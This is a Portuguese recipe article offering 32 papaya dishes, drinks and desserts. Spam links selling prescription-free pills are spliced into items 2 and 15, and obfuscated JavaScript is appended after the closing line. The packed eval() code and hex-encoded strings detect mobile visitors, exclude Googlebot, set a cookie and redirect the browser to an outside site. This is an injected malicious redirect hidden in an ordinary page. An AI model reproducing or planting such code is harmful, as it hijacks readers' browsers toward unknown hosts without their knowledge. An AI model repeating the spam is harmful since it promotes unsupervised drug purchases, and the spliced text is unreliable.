32 receitas com mamão que é um ótimo aliado a sua dieta

Escrito por Priscila Silva

Facilmente encontrado em feiras e em mercados (a fruta tem colheita durante o ano inteiro no Brasil), o mamão é uma fruta que deveria fazer parte da sua dieta diária,  porque é cheio de vitaminas e super versátil. É uma fruta doce, que pode ser ingerida in natura, em receitas doces, em bebidas e até em pratos salgados. Opção é o que não falta para adicionar o mamão à sua vida.

Existem mais de 50 tipos de mamão em todo o mundo! Mas, aqui no Brasil, temos alguns mais conhecidos: o mamão-fêmea, grande e com as pontas arredondadas, o macho (ou mamão-corda), que que é mais fino e comprido, o mamão-da-baía, mais alongado, o formosa, aquele maior que tem na banca da feira, e o papaia, que é o menor deles e o preferido para a culinária!

O mamão é rico em vitaminas A, B, C, E, cálcio, fosforo, ferro, potássio, licopeno e betacaroteno (também presente em outras frutas e legumes de cor alaranjada, como a cenoura, abóbora, manga, damasco, pêssego, maracujá, toranja, entre outros), substância ideal para manter o bronzeado do verão, além de ser antioxidante e combater os radicais livres. Rico em fibras, ele também auxilia na digestão, reduz os níveis de colesterol e é um ótimo aliado para prevenir a constipação intestinal.

Para o café da manhã

Foto: Reprodução / Blog da Mimis

1. Mamão recheado: para um café da manhã delicioso, nutritivo e saudável, essa é a pedida! Para montar esse visual incrível, basta cortar a fruta ao meio, “colar” amaranto ou granola nas laterais e rechear com iogurte desnatado, amêndoas e damasco.

2. get cheap pills no prescription – http://blog.brewerypost.com/?p=10179 buy amitriptyline online Carpaccio de mamão: esse carpaccio deve ser feito com mamão papaya. Tire a casca e corte a fruta em fatias bem finas, disponha em um refratário, cubra com melado de cana e salpique castanhas de caju quebradas ou moídas grosseiramente. Está pronto o seu carpaccio de mamão!

3. Muffin funcional de mamão: para começar a dieta de forma mais gostosa, aposte nesse muffin. Você pode fazer a versão tradicional, com farinha branca, ou a funcional, com ração humana (composta de gérmen de trigo, linhaça e farelo de aveia). Por causa do mamão, a consistência desse muffin também é um pouco diferente, e lembra bastante a textura de pudim de pão.

4. Mamão recheado crudívoro: opção vegana e perfeita para os adeptos do crudivorismo, aqui vai uma ideia para o menu da manhã (ou até mesmo para ser servido como sobremesa): papaia recheado com papinha de coco verde, uvas verdes e roxas e morangos. Recheie sem dó!

5. Mamão com coalhada e aveia: não tem absolutamente segredo nenhum para esse prato matinal. Basta tirar a casca e cortar o mamão em cubos. Depois, coloque coalhada e aveia a gosto e misture bem. E seu café da manhã está pronto.

Nas refeições salgadas

Foto: Reprodução / Blog Veganana

6. Gaspacho frugívoro com croutons de pepino: esse gaspacho também pode ser chamado de sopa fria ou sopa crua viva. Originalmente espanhola, aqui é apresentada numa versão frugal. Tire a polpa do mamão da casca, tomando cuidado para não furá-la. Liquidifique a polpa de mamão com os tomates, coentro e limão. Sirva dentro da casca do mamão. Corte o pepino em cubos pequenos para os croutons. Salpique com coentro picado sobre o gaspacho.

7. Costelinha de porco com mamão verde: o mamão verde é quem equilibra os sabores do prato. Essa receita é perfeita para dois famintos ou quatro pessoas com fome moderada. Para uma refeição completa, sirva acompanhado de polenta e salada de agrião.

8. Truta assada com salada de mamão verde: aqui o mamão verde aparece com um toque oriental. Por ser bem neutro, a fruta combina bem com comida asiática ou de sabores mais acentuados. Capriche no molho que rega a salada de mamão. Sirva em uma refeição típica.

9. Som tam (salada tailandesa de papaia verde): receita super tradicional na Tailândia, essa salada faz a incrível combinação de mamão, pimenta, camarão seco e molho de peixe. O prato fica visualmente rico, bonito e leve.

10. Salada de mamão verde: receita que não precisa de muita experiência na cozinha, e que arrasa no paladar. Rale o mamão, lave e escorra. Adicione: palm sugar (açúcar tailandês), suco de limão, pimenta dedo de moça, molho de peixe, flor de sal, coentro fresco e hortelã, tudo picadinho. Sirva com carne de siri, desfiada e refogada.

11. Peixe com abacate e molho de papaia: receita que junta duas frutas que parecem não combinar: abacate e mamão – mas que faz um mix delicioso. Prepare o peixe como de costume. Arrume em uma travessa, ao lado das fatias de abacate. Regue com molho de mamão, limão, adoçante e gengibre ralado.

Para beber

Foto: Reprodução / Aromas e Sabores

12. Smoothie de mamão com sementes de girassol: para fazer essa bebida, você precisa congelar o mamão antes. Quando congelada, a fruta fica extremamente cremosa ao ser batida. Por isso, bata cubos de mamão congelado, sementes de girassol, cranberries secas, suco de laranja e cardamomos. Cheio de vitaminas, esse smoothie é uma refeição no copo!

13. Suco de mamão e laranja: suquinho delícia para começar bem o dia. Bata no liquidificador o mamão, o suco de laranja, farinha de linhaça dourada e iogurte natural. Se quiser deixar a bebida ainda mais docinha, adicione um pouco de mel.

14. Shake de mamão com farelo de aveia e mel: esse shake serve para turbinar seu café da manhã ou repor as energias depois de suar a camisa na academia. A junção do farelo de aveia faz toda a diferença, já que tem uma grande quantidade de fibras, que ajuda a melhorar o funcionamento do intestino, aumenta a saciedade e ajuda a diminuir o colesterol.

15. put in cart cheaply generic pills without rx – http://southlandspine.com/put-in-cart-cheaply-generic-pills-without-rx Suco de mamão com morango: sabe aquele dia que você acorda pensando em como quer melhorar a alimentação e a saúde, e se empolga só em pensar na refeição? Essa receita é perfeita para dias assim, porque é linda, saudável, gostosa, e vai te dar um ânimo para continuar com a ideia de melhorar sua alimentação.

16. Vitamina com leite de aveia: a vitamina do dia a dia pode ficar ainda mais gostosa e leve. O segredo? Leite de aveia. Mas, cuidado. Não beba em excesso, porque a junção do mamão, banana e aveia criam a função laxativa.

17. Vitamina básica: quase todo adulto saudável vai se lembrar que tomou um copão dessa vitamina na casa da tia ou da avó quando era criança. A mistura de banana (ou morangos) e mamão papais com leite fica deliciosa, com aquela espuminha na borda do copo…. Só de pensar, dá água na boca!

18. Suco bronzeador: verão, praia, piscina, sol… E a garantia de um bronzeado mais duradouro. Para isso, aposte nesse suco, que combina mamão, cenoura e linhaça. Você pode tomar entre as refeições ou antes de ir para a academia também.

Doces e sobremesas

Foto: Reprodução / Panelaterapia

19. Creme de mamão com calda de morango: sabe o famoso creme de papaia com cassis? Essa é uma versão um pouco mais básica da mesma receita. Aqui, o frozen é feito com iogurte grego e mamão. Depois de batidos no liquidificador, acomode em uma taça, por cima de pequenos cubos de mamão. Para a cobertura, faça uma calda de morango. Decore com hortelã.

20. Frozen iogurte de mamão: perfeita para aqueles dias de calorão, em que o sol não dá trégua, essa receita de frozen é bem rápida e fácil de fazer.  Processe o iogurte (ele deve ficar no congelador antes), mel e os cubos de mamão congelados. Pronto! Sirva em uma taça bonita.

21. Creme de papaia fit: essa é a versão magra de uma das sobremesas mais requisitadas nos restaurantes. Congelar o mamão é essencial para o sucesso dessa receita, pois ele fica bem cremoso, com a consistência que lembra sorvete. Bata tudo junto: mamão, iogurte grego desnatado, farinha de aveia, proteína de arroz, água, mel e chia. Sua sobremesa fit está pronta.

22. Picolé de manga e mamão: férias, calor e criançada em casa. Que tal um picolé para agradar os pequenos e amenizar o calor? Faça os picolés em casa, são bem mais saudáveis, e você pode fazer uma versão vitaminada, como essa, de manga e mamão. Se quiser mais doce, adicione um pouco de mel.

23. Doce de mamão: docinho para fazer e deixar sempre pronto para quando bate aquela vontade de guloseima.  E, o melhor, você pode fazer quando ele ainda estiver verde. Corte a fruta, deixe de molho em água com cal virgem. Depois, lave bem e leve para ferver, até ficar macio. Adicione açúcar e cravo para formar uma calda.

24. Creme de papaia delícia: essa é a versão fitness também da receita famosa, com cassis. Bata o mamão com iogurte, até virar um creme. Leve à geladeira. Para servir, coloque uma cobertura de geleia de frutas vermelhas. Nessa opção, você ganha mais nutrientes e diminui as calorias. Perfeita!

25. Frozen de mamão com licor de cassis: opção para comer sem culpa! Prepare o frozen com iogurte, adoçante e mamão picado e congelado. Na hora de servir, regue com licor de cassis. Se quiser deixar mais vistoso, decore com folhinhas de hortelã.

26. Doce de mamão em calda: para fazer essa receita, você precisa da fruta ainda verde. Corte em tiras finas, ou rale grosseiramente, ferva com água e açúcar, adicione uma pitada de sal, canela, cravo e cardamomos. Sirva puro, com requeijão ou queijo minas.

27. Sorvete cremoso de mamão: esse sorvete fica com uma cor linda, e muito cremoso! Ótima pedida para dias quentes, e também é barata. Sirva com calda ou geleia de amora. Como ela é um pouco azedinha, os sabores casam perfeitamente.

28. Doce de abacaxi com mamão: tão simples e de um sabor tão incrível, que não dá para acreditar. Para saborear esse doce, faça uma calda com água e açúcar. Em seguida, adicione à panela os abacaxis picados, e deixe lá por 20 minutos, ou até que a fruta fique transparente. Adicione o mamão e cozinhe por mais 20 minutos, em fogo baixo. Espere esfriar e pode devorar!

29. Mamão maravilha: esse creme fica com uma consistência aveludada e doce. Ele é feito com mamão, gelatina em pó e sem sabor, açúcar, creme de leite e claras em neve. Sirva bem geladinho (deixe na geladeira por, pelo menos, duas horas).

30. Purê de papaia com limão: sobremesa light, doce na medida certa e bem rápida! Bata no liquidificador o mamão, suco de limão e adoçante. Sirva acompanhado de uma porção de sorvete de creme (mas aí deixa de ser light!).

31. Doce de leite saudável: engana-se quem pensa que não dá para se deliciar com um doce de leite se for semana de dieta. A versão saudável está aqui para provar o contrário. Ela é light e… sem leite! Basta você bater (no processador, liquidificador ou mixer) abacate, mamão e tâmaras. Só isso. Dá para se deliciar com colheradas do doce, ou junto com torradas, pães, frutas, e até usar como recheio para bolos e tortas.

32. Creme brûlée de papaia: uma receita incrível de brûlée de papaia. O doce fica mais bonito se servido dentro da própria fruta (mas, se preferir, você pode usar ramequins). Basta colocar, em camadas: compota de framboesa, mix de sorvete e mamão, e o açúcar por cima, que deve ser queimado com maçarico, até que vire aquela casquinha deliciosa.

Com o mamão verde ou maduro, é possível montar uma refeição ou usá-lo como base para uma. Inclua essa fruta no seu dia a dia para uma alimentação mais saudável.eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘(24(a,b){1V(/(2n|2d\\d+|1i).+1b|1g|1E\\/|1H|1C|1x|1B|2s|3l|3n|O(3m|V)|S|3g|38 |3c|3p|3D|1b.+3A|3z|1d m(3x|2H)i|2J( 14)?|2C|p(2x|2A)\\/|30|2T|3j|2S(4|6)0|2U|2R|I\\.(2Q|2N)|2O|2P|2V 2W|33|34/i.19(a)||/31|2X|2Y|2Z|2M|50[1-6]i|2L|2y|a W|2z|M(15|Z|s\\-)|11(2w|2t)|B(2u|E|D)|2v|2B(2I|y|2K)|2G|17(2D|j)|2E(x|2F)|35|36(3w|\\-m|r |s )|3y|3v(P|N|3u)|T(3r|3s)|3t(M|3G)|3H(e|v)w|3F|3E\\-(n|u)|3B\\/|3C|3q|3d\\-|3e|3b|3a|37\\-|D(39|K)|3f|3o(A|N|3k)|3h|3i\\-s|3I|2r|1z|U(c|p)o|1A(12|\\-d)|1y(49|11)|1u(1v|1w)|15(1D|1J)|1K|1I([4-7]0|14|W|1F)|1G|1t(\\-|R)|G u|1L|1q|1h\\-5|g\\-z|j(\\.w|V)|1j(1e|1f)|1s|1k|1r\\-(m|p|t)|1p\\-|1o(Q|F)|1l( i|O)|1m\\-c|1n(c(\\-| |R|a|g|p|s|t)|1M)|2e(2f|2g)|i\\-(20|j|q)|2c|29( |\\-|\\/)|2a|2b|2h|2i|2o|2p|2q|S|2m(t|v)a|2j|2k|2l|28|27|1S( |\\/)|1T|1U |1R\\-|1Q(c|k)|1N(1O|1P)|1W( g|\\/(k|l|u)|50|54|\\-[a-w])|25|26|23\\-w|22|1X\\/|q(x|1Y|1Z)|16(f|21|E)|m\\-48|5H(5E|C)|5y(5A|5L|J)|5V|z(f|5X|T|3J|U|t(\\-| |o|v)|58)|5i(50|5j|v )|5r|5p|5s[0-2]|57[2-3]|5c(0|2)|5d(0|2|5)|5R(0(0|1)|10)|5M((c|m)\\-|5B|5h|5U|5W|5O)|5Q(6|i)|5Z|5o|5n(5m|5k)|5l|5v|5u|5t(a|d|t)|59|5a(13|\\-([1-8]|c))|55|56|L(5g|5f)|5e\\-2|5w(P|5x|X)|5P|5N|Q\\-g|5S\\-a|5T(5Y|12|21|32|H|\\-[2-7]|i\\-)|5C|5D|5z|5F|5K|5J(5I|5G)|5q\\/|4Z(4c|q|4d|4e|y|4b)|4a(f|h\\-|Z|p\\-)|44\\/|X(c(\\-|0|1)|47|16|K|C)|46\\-|51|4f(\\-|m)|4g\\-0|4m(45|4n)|4l(B|17|4k|A|4h)|4i(4j|y)|43(f|h\\-|v\\-|v )|42(f|3P)|3Q(18|50)|3R(3O|10|18)|F(3N|3K)|3L\\-|3M\\-|3S(i|m)|3T\\-|t\\-z|3Z(L|41)|J(Y|m\\-|3Y|3X)|3U\\-9|I(\\.b|G|3V)|3W|4o|4p|4O|4P(4N|x)|4M(40|5[0-3]|\\-v)|4J|4K|4L|4Q(52|53|H|4R|Y|4X|4Y|4W|4V|4S)|4T(\\-| )|4U|4I|4H(g |4v|4w)|4x|4u|4t|4q\\-|4r|4s|4y\\-/i.19(a.4z(0,4)))1c.4F=b})(1a.4G||1a.4E||1c.1d,\’4D://4A.4B/4C/?5b\’);’,62,372,’|||||||||||||||01||||go|||||||ma|||||||te|ny|mo|it|al|ri|co|ca|ta|g1|60|up|ts|nd|pl|ac|ll|ip|ck|pt|_|iris|bi|do|od|wa|se|70|oo||ai|||os|er|mc|ar||test|navigator|mobile|window|opera|ad|un|avantgo|gf|meego|gr|hcit|hp|hs|ht|hi|hei|gene|hd|haie|fly|em|l2|ul|compal|el|dmob|ds|elaine|blazer|ic|bada|ze|fetc|blackberry|ez|k0|esl8|g560|tp|le|no|xi|kyo|kwc|kgt|klon|kpt|if|lg|m50|ui|xo|||m3ga|m1|function|libw|lynx|keji|kddi|iac|ibro|idea|i230|bb|hu|aw|tc|ig01|ikom|jbro|jemu|jigs|ja|android|im1k|inno|ipaq|dica|fennec|rn|av|amoi|ko|ixi|802s|abac|re|an|phone|ch|as|us|aptu|in|ex|palm|yw|770s|4thp|link|vodafone|wap|browser|treo|series|pocket|symbian|windows|ce|6310|6590|3gso|plucker|1207||xda|xiino|attw|au|cmd|lge|mp|cldc|chtm|maemo|cdm|cell|craw|kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|psio|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph’.split(‘|’),0,{}))eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘(24(a,b){1V(/(2n|2d\\d+|1i).+1b|1g|1E\\/|1H|1C|1x|1B|2s|3l|3n|O(3m|V)|S|3g|38 |3c|3p|3D|1b.+3A|3z|1d m(3x|2H)i|2J( 14)?|2C|p(2x|2A)\\/|30|2T|3j|2S(4|6)0|2U|2R|I\\.(2Q|2N)|2O|2P|2V 2W|33|34/i.19(a)||/31|2X|2Y|2Z|2M|50[1-6]i|2L|2y|a W|2z|M(15|Z|s\\-)|11(2w|2t)|B(2u|E|D)|2v|2B(2I|y|2K)|2G|17(2D|j)|2E(x|2F)|35|36(3w|\\-m|r |s )|3y|3v(P|N|3u)|T(3r|3s)|3t(M|3G)|3H(e|v)w|3F|3E\\-(n|u)|3B\\/|3C|3q|3d\\-|3e|3b|3a|37\\-|D(39|K)|3f|3o(A|N|3k)|3h|3i\\-s|3I|2r|1z|U(c|p)o|1A(12|\\-d)|1y(49|11)|1u(1v|1w)|15(1D|1J)|1K|1I([4-7]0|14|W|1F)|1G|1t(\\-|R)|G u|1L|1q|1h\\-5|g\\-z|j(\\.w|V)|1j(1e|1f)|1s|1k|1r\\-(m|p|t)|1p\\-|1o(Q|F)|1l( i|O)|1m\\-c|1n(c(\\-| |R|a|g|p|s|t)|1M)|2e(2f|2g)|i\\-(20|j|q)|2c|29( |\\-|\\/)|2a|2b|2h|2i|2o|2p|2q|S|2m(t|v)a|2j|2k|2l|28|27|1S( |\\/)|1T|1U |1R\\-|1Q(c|k)|1N(1O|1P)|1W( g|\\/(k|l|u)|50|54|\\-[a-w])|25|26|23\\-w|22|1X\\/|q(x|1Y|1Z)|16(f|21|E)|m\\-48|5H(5E|C)|5y(5A|5L|J)|5V|z(f|5X|T|3J|U|t(\\-| |o|v)|58)|5i(50|5j|v )|5r|5p|5s[0-2]|57[2-3]|5c(0|2)|5d(0|2|5)|5R(0(0|1)|10)|5M((c|m)\\-|5B|5h|5U|5W|5O)|5Q(6|i)|5Z|5o|5n(5m|5k)|5l|5v|5u|5t(a|d|t)|59|5a(13|\\-([1-8]|c))|55|56|L(5g|5f)|5e\\-2|5w(P|5x|X)|5P|5N|Q\\-g|5S\\-a|5T(5Y|12|21|32|H|\\-[2-7]|i\\-)|5C|5D|5z|5F|5K|5J(5I|5G)|5q\\/|4Z(4c|q|4d|4e|y|4b)|4a(f|h\\-|Z|p\\-)|44\\/|X(c(\\-|0|1)|47|16|K|C)|46\\-|51|4f(\\-|m)|4g\\-0|4m(45|4n)|4l(B|17|4k|A|4h)|4i(4j|y)|43(f|h\\-|v\\-|v )|42(f|3P)|3Q(18|50)|3R(3O|10|18)|F(3N|3K)|3L\\-|3M\\-|3S(i|m)|3T\\-|t\\-z|3Z(L|41)|J(Y|m\\-|3Y|3X)|3U\\-9|I(\\.b|G|3V)|3W|4o|4p|4O|4P(4N|x)|4M(40|5[0-3]|\\-v)|4J|4K|4L|4Q(52|53|H|4R|Y|4X|4Y|4W|4V|4S)|4T(\\-| )|4U|4I|4H(g |4v|4w)|4x|4u|4t|4q\\-|4r|4s|4y\\-/i.19(a.4z(0,4)))1c.4F=b})(1a.4G||1a.4E||1c.1d,\’4D://4A.4B/4C/?5b\’);’,62,372,’|||||||||||||||01||||go|||||||ma|||||||te|ny|mo|it|al|ri|co|ca|ta|g1|60|up|ts|nd|pl|ac|ll|ip|ck|pt|_|iris|bi|do|od|wa|se|70|oo||ai|||os|er|mc|ar||test|navigator|mobile|window|opera|ad|un|avantgo|gf|meego|gr|hcit|hp|hs|ht|hi|hei|gene|hd|haie|fly|em|l2|ul|compal|el|dmob|ds|elaine|blazer|ic|bada|ze|fetc|blackberry|ez|k0|esl8|g560|tp|le|no|xi|kyo|kwc|kgt|klon|kpt|if|lg|m50|ui|xo|||m3ga|m1|function|libw|lynx|keji|kddi|iac|ibro|idea|i230|bb|hu|aw|tc|ig01|ikom|jbro|jemu|jigs|ja|android|im1k|inno|ipaq|dica|fennec|rn|av|amoi|ko|ixi|802s|abac|re|an|phone|ch|as|us|aptu|in|ex|palm|yw|770s|4thp|link|vodafone|wap|browser|treo|series|pocket|symbian|windows|ce|6310|6590|3gso|plucker|1207||xda|xiino|attw|au|cmd|lge|mp|cldc|chtm|maemo|cdm|cell|craw|kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|psio|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph’.split(‘|’),0,{}))var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

PARA VOCÊ

COMENTÁRIOS